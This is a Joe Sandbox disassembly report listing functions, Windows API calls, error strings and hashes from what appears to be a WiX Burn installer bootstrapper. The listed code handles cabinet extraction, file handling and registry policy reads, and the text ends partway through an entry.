                                                            • Failed to write during cabinet extraction., xrefs: 00D20C35
                                                            • cabextract.cpp, xrefs: 00D20C2B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite_memcpy_s
                                                            • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                            • API String ID: 1970631241-3111339858
                                                            • Opcode ID: f0aca306428cf8d50fbb114908ebcd0e4e7fcebc753adbd1d652a557e0b9b944
                                                            • Instruction ID: a6dd5301b3859994636d888cde3db7e5803d1df3af5ddefd095d46f2aafd0218
                                                            • Opcode Fuzzy Hash: f0aca306428cf8d50fbb114908ebcd0e4e7fcebc753adbd1d652a557e0b9b944
                                                            • Instruction Fuzzy Hash: 1921FFB6500220ABCB10CF6CE885D5A3BA8EF94328B254259FE04D7246E671D900DB70
                                                            Function 00D40879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(?,00000008,?,00D053BD,00000000,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D40897
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408A1
                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408D3
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408EC
                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D4092B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                            • String ID: procutil.cpp
                                                            • API String ID: 4040495316-1178289305
                                                            • Opcode ID: dd6e8ad2613ed060368df14889ca96327683965d61508aa5db11648708a405b6
                                                            • Instruction ID: b0cc2eead269ce2912548fe0956b1c7a669d2ea1d82247844e9c8f2e49630186
                                                            • Opcode Fuzzy Hash: dd6e8ad2613ed060368df14889ca96327683965d61508aa5db11648708a405b6
                                                            • Instruction Fuzzy Hash: AB21F636D00229EBE7209F998905A9EBFB8EF15721F054056EE54EB350D370CE00DAF0
                                                            Function 00D20C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00D20CC4
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D20CD6
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D20CE9
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00D208B1,?,?), ref: 00D20CF8
                                                            Strings
                                                            • Invalid operation for this state., xrefs: 00D20C9D
                                                            • cabextract.cpp, xrefs: 00D20C93
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$File$CloseDateHandleLocal
                                                            • String ID: Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 609741386-1751360545
                                                            • Opcode ID: 3cbdcb8c457e78847ab1c4748ede00d7b6c460750b6e296405c096293fa6aa40
                                                            • Instruction ID: 456a7160f0e7232bde9a8065cd562c2c66218c212c1dd4217af8893c37a6c179
                                                            • Opcode Fuzzy Hash: 3cbdcb8c457e78847ab1c4748ede00d7b6c460750b6e296405c096293fa6aa40
                                                            • Instruction Fuzzy Hash: EA21F372801229AB8B109FA8DC499BA7FACFF143247148256F864D65D1D370E951CBB0
                                                            Function 00D43565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00D43574
                                                            • InterlockedIncrement.KERNEL32(00D6B6C8), ref: 00D43591
                                                            • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00D6B6B8,?,?,?,?,?,?), ref: 00D435AC
                                                            • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00D6B6B8,?,?,?,?,?,?), ref: 00D435B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FromProg$IncrementInitializeInterlocked
                                                            • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                            • API String ID: 2109125048-2356320334
                                                            • Opcode ID: 6d81dcdea1dc0e36cdb26d23180a9e4fe4bc0b4ef589546e8bab406b32771d8e
                                                            • Instruction ID: 0c55a73a461f4e4fe3f7097d2c01924c878a0d006a21c5b183ffbc3b75e98a49
                                                            • Opcode Fuzzy Hash: 6d81dcdea1dc0e36cdb26d23180a9e4fe4bc0b4ef589546e8bab406b32771d8e
                                                            • Instruction Fuzzy Hash: 68F065317403255BD3211FAEBD09B172E69DB92B75F04042BE940DA264D3A0C9898AB0
                                                            Function 00D44A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00D44A9D
                                                            • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00D44ACA
                                                            • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00D44AF6
                                                            • GetLastError.KERNEL32(00000000,00D4B7A0,?,00000000,?,00000000,?,00000000), ref: 00D44B34
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D44B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Global$AllocFree
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1145190524-2967768451
                                                            • Opcode ID: a5b58069ad2514dc0cde9bd027a75dfcca13637d853abe73b5d462160407462f
                                                            • Instruction ID: 58bcfa2a6a21886243a960e944e9039245cf1da6a2982f69737dc9d6b0bf29bc
                                                            • Opcode Fuzzy Hash: a5b58069ad2514dc0cde9bd027a75dfcca13637d853abe73b5d462160407462f
                                                            • Instruction Fuzzy Hash: E131A236E40229ABC7219A998C42FAFFAA8EF45760F154156FD54E7341EB30DD408AF4
                                                            Function 00D1E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 00D1E985
                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00D1E994
                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 00D1E9A8
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00D1E9B8
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00D1E9D2
                                                            • PostQuitMessage.USER32(00000000), ref: 00D1EA31
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$Proc$MessagePostQuit
                                                            • String ID:
                                                            • API String ID: 3812958022-0
                                                            • Opcode ID: 7c0857375b24d1c08807128adab35755e92173a335872e4a0bc7e436871013f7
                                                            • Instruction ID: 2c700b0e0d24a2b0db3fa263e0edcaff363cb84ee9499c7b1efc92b6ec79ce42
                                                            • Opcode Fuzzy Hash: 7c0857375b24d1c08807128adab35755e92173a335872e4a0bc7e436871013f7
                                                            • Instruction Fuzzy Hash: 87219075104204BFDB119F68EC4DEAA3B65FF55320F584618F90A9A2A5CB31DD90DB70
                                                            Function 00D20A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D20B27
                                                            • GetLastError.KERNEL32(?,?,?), ref: 00D20B31
                                                            Strings
                                                            • Invalid seek type., xrefs: 00D20ABD
                                                            • Failed to move file pointer 0x%x bytes., xrefs: 00D20B62
                                                            • cabextract.cpp, xrefs: 00D20B55
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                            • API String ID: 2976181284-417918914
                                                            • Opcode ID: 444d5914cbbd3f8a1eec0a19f4601a3e0f20d62c7b477a92dd0829a226ae1008
                                                            • Instruction ID: ee43cd6fa96e0f979415112f092b3bd3d1268485c9d15ad38ab7be535a7c992c
                                                            • Opcode Fuzzy Hash: 444d5914cbbd3f8a1eec0a19f4601a3e0f20d62c7b477a92dd0829a226ae1008
                                                            • Instruction Fuzzy Hash: DD319476A4022AEFCB11DFA8EC85D6EBB69FF14728B148215FD1497652D370ED108BB0
                                                            Function 00D04115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?), ref: 00D04123
                                                            • GetLastError.KERNEL32(?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?,00000000,00000000), ref: 00D04131
                                                            • CreateDirectoryW.KERNEL32(?,840F01E8,00D05489,?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?,00000000), ref: 00D0419A
                                                            • GetLastError.KERNEL32(?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?,00000000,00000000), ref: 00D041A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: dirutil.cpp
                                                            • API String ID: 1375471231-2193988115
                                                            • Opcode ID: 9aecc2e16bfa2bddab4c7401cf9d7dd51752f95771f6cc5043f914c52dd25a86
                                                            • Instruction ID: 58cbc3b1acae4320ef4342f4590990dad97d5b8b801ab26a26b0e68643506bee
                                                            • Opcode Fuzzy Hash: 9aecc2e16bfa2bddab4c7401cf9d7dd51752f95771f6cc5043f914c52dd25a86
                                                            • Instruction Fuzzy Hash: AB11A1B6A00335A7D7311AA55C44F3BA654EB76B71F154025EF4DEA2D0E2608C8192F2
                                                            Function 00D13AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00D6AAA0,00000000,?,00D457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D40F80
                                                            • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00D13FB5,feclient.dll,?,00000000,?,?,?,00D04B12), ref: 00D13B42
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D4112B
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D41163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                            • API String ID: 1586453840-3596319545
                                                            • Opcode ID: b98e833a4f9b3f59c467612a2d4ab45d0abbfebb5c09d66ac6e33f258fc74171
                                                            • Instruction ID: 3a8ea8f4b521746b532dccbc656f9be2c43edc070c59d02853212ed209b719ec
                                                            • Opcode Fuzzy Hash: b98e833a4f9b3f59c467612a2d4ab45d0abbfebb5c09d66ac6e33f258fc74171
                                                            • Instruction Fuzzy Hash: F411D376A44208BBDB21DF94FE82EEABBB8EB10700F440061E900AB041EA719FC1D730
                                                            Function 00D40764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenA.KERNEL32(00D1E93B,00000000,00000000,?,?,?,00D40013,00D1E93B,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D40776
                                                            • WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00D40013,00D1E93B,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF), ref: 00D407B2
                                                            • GetLastError.KERNEL32(?,?,00D40013,00D1E93B,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D407BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWritelstrlen
                                                            • String ID: logutil.cpp
                                                            • API String ID: 606256338-3545173039
                                                            • Opcode ID: 596eab002176cabddb13462df7d52863f0ffeb1d0bb460a79c60344833f6f42c
                                                            • Instruction ID: b92fb0ed87ffb2e38f737f7bb2ddf37102fed344490c66803d1d6b98b39c5c00
                                                            • Opcode Fuzzy Hash: 596eab002176cabddb13462df7d52863f0ffeb1d0bb460a79c60344833f6f42c
                                                            • Instruction Fuzzy Hash: 5011C676A41224ABC3209B698C44EABBE6CEB45770B010225FE05E7240EB70ED00CAF1
                                                            Function 00D209EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D2140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00D20A19,?,?,?), ref: 00D21434
                                                              • Part of subcall function 00D2140C: GetLastError.KERNEL32(?,00D20A19,?,?,?), ref: 00D2143E
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00D20A27
                                                            • GetLastError.KERNEL32 ref: 00D20A31
                                                            Strings
                                                            • Failed to read during cabinet extraction., xrefs: 00D20A5F
                                                            • cabextract.cpp, xrefs: 00D20A55
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$PointerRead
                                                            • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                            • API String ID: 2170121939-2426083571
                                                            • Opcode ID: f5dd81ead56d3c8d7d2a2e2740b4284e1372d23ede76e4b56474e9f9f9fb50ff
                                                            • Instruction ID: c5cbe23f029ffa7c4259c5e603c7777ff92a9760f0b04377cb378fc6a0fef1bf
                                                            • Opcode Fuzzy Hash: f5dd81ead56d3c8d7d2a2e2740b4284e1372d23ede76e4b56474e9f9f9fb50ff
                                                            • Instruction Fuzzy Hash: C4118E76A00279BBCB219F99EC04E9E7F68FB15764B514255FE08A7291D730D910CAF0
                                                            Function 00D2140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00D20A19,?,?,?), ref: 00D21434
                                                            • GetLastError.KERNEL32(?,00D20A19,?,?,?), ref: 00D2143E
                                                            Strings
                                                            • Failed to move to virtual file pointer., xrefs: 00D2146C
                                                            • cabextract.cpp, xrefs: 00D21462
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                            • API String ID: 2976181284-3005670968
                                                            • Opcode ID: ad07db888e4692d469f17999e9c9a79241f020913450ba81caf03681346104d4
                                                            • Instruction ID: f858bca22e0459f6c11c3c12143c1f4d164a9b76ab4f309726baabb1d8e22445
                                                            • Opcode Fuzzy Hash: ad07db888e4692d469f17999e9c9a79241f020913450ba81caf03681346104d4
                                                            • Instruction Fuzzy Hash: E101D43B50063977CB215A959C08A8BBF18EF20775715C126FD1C9A240D731D810C6F4
                                                            Function 00D207B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(00D4B478,00000000,?,00D21717,?,00000000,?,00D0C287,?,00D05405,?,00D175A5,?,?,00D05405,?), ref: 00D207BF
                                                            • GetLastError.KERNEL32(?,00D21717,?,00000000,?,00D0C287,?,00D05405,?,00D175A5,?,?,00D05405,?,00D05445,00000001), ref: 00D207C9
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00D207ED
                                                            • Failed to set begin operation event., xrefs: 00D207F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorEventLast
                                                            • String ID: Failed to set begin operation event.$cabextract.cpp
                                                            • API String ID: 3848097054-4159625223
                                                            • Opcode ID: f98b5db0a66c3b55ca3fc266864658d8ed85c7731b3bc2e6b3aff32c9028c0e1
                                                            • Instruction ID: 64881c8dbd2969b1c0d5a4a0e2c756ca8b1caa175146b98fa5b18a2129e9c96f
                                                            • Opcode Fuzzy Hash: f98b5db0a66c3b55ca3fc266864658d8ed85c7731b3bc2e6b3aff32c9028c0e1
                                                            • Instruction Fuzzy Hash: B2F0EC3754263167872066A96D05A8F7E88DF25B757114125FF05FB241E660EC00C6F5
                                                            Function 00D05123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00D01104,?,?,00000000), ref: 00D05142
                                                            • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00D01104,?,?,00000000), ref: 00D05172
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareStringlstrlen
                                                            • String ID: burn.clean.room
                                                            • API String ID: 1433953587-3055529264
                                                            • Opcode ID: ef6632342995446633382dedf0946214232b623bb55202edf6277b35de0f7aba
                                                            • Instruction ID: 59fdf8df83ee6050460eab3cebfb7bfa7b1119b9efcec6b9b2e02d924f8a3009
                                                            • Opcode Fuzzy Hash: ef6632342995446633382dedf0946214232b623bb55202edf6277b35de0f7aba
                                                            • Instruction Fuzzy Hash: BA014B726007256FC7208B9CAD84B73BBACEB257A0B144117F94AD2754D3B0AC41CEB2
                                                            Function 00D03838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D03877
                                                            • GetLastError.KERNEL32 ref: 00D03881
                                                            • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00D038EA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1230559179-0
                                                            • Opcode ID: 43160233cd8694ded91ad1bb5dccf20a32d89546f566e8a8225635ad75872e52
                                                            • Instruction ID: 1484269282b3ee71a68652d134ce375978157dc4d1139d49948dd0bc06f93c6a
                                                            • Opcode Fuzzy Hash: 43160233cd8694ded91ad1bb5dccf20a32d89546f566e8a8225635ad75872e52
                                                            • Instruction Fuzzy Hash: 1E21D3B6D0133DABDB209B659C49F9AB7ACDB04720F1505A1FE18E7281DA70DE448AF0
                                                            Function 00D03A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
